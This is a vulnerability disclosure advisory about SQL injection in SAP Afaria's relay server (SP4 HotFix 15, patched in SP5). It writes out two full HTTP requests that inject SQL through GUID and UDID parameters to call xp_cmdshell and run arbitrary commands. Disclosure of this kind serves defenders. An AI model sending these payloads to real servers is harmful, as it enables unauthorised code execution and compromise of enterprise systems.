SSD Advisory – SAP Afaria SQL Injection
The following advisory describes an SQL injection vulnerabilities in the SAP Afaria Service Pack 4 HotFix 15 that can lead to execute arbitrary code.
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
SAP Afaria has released patch to address the vulnerability – SP5
When Afaria installed on mobile device, the user is given an “enrollment code” which is used to identify the relay server. This enrollment code is a URI on tinyurl that redirects to the relay server so that users do not have to type in the https://FQDN/path.
The following two HTTP requests can be used to trigger the SQL injection and call the MS SQL Server’s xp_cmdshell command and cause the SQL server to execute arbitrary code.
Command Injection #1
GET /ias_relay_server/client/rs_client.dll/mdm-es/devauth/aipService.svc/StartEnrollment?GUID=GUID';CALL%20xp_cmdshell('INJECT_COMMAND');-- HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip, deflate Connection: keep-alive
Command Injection #2
GET /ias_relay_server/client/rs_client.dll/mdm-es/devunauth/aipService.svc/GetClientBrandingData?UDID=UDID';CALL%20xp_cmdshell('INJECT_COMMAND');--&TenantID=0&ImageType=iPad1G HTTP/1.1 Host: example.com:443 User-Agent: Afaria iPhone Client Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate Cookie: ias-rs-sessionid="cookie" Connection: keep-alive